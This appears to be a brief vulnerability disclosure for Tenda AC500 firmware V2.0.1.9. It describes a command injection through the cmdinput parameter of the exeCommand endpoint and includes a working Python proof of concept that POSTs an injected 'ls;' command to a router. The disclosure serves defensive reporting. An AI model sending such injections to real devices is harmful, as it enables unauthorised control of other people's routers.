- Firmware download website: https://www.tenda.com.cn/download/detail-2470.html
AC500 V2.0.1.9(1307)
The Tenda AC500 V2.0.1.9(1307) firmware, we discovered a command injection vulnerablility in formexeCommand function in the cmdinput parameter and the str varable is assigned to cmd_buf variable, which is directly used in doSystemCmd function, causing an arbitrary command execution. The user-provided cmdinput can trigger this security vulnerability.
import requests
IP = "192.168.84.102"
url = f"http://{IP}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)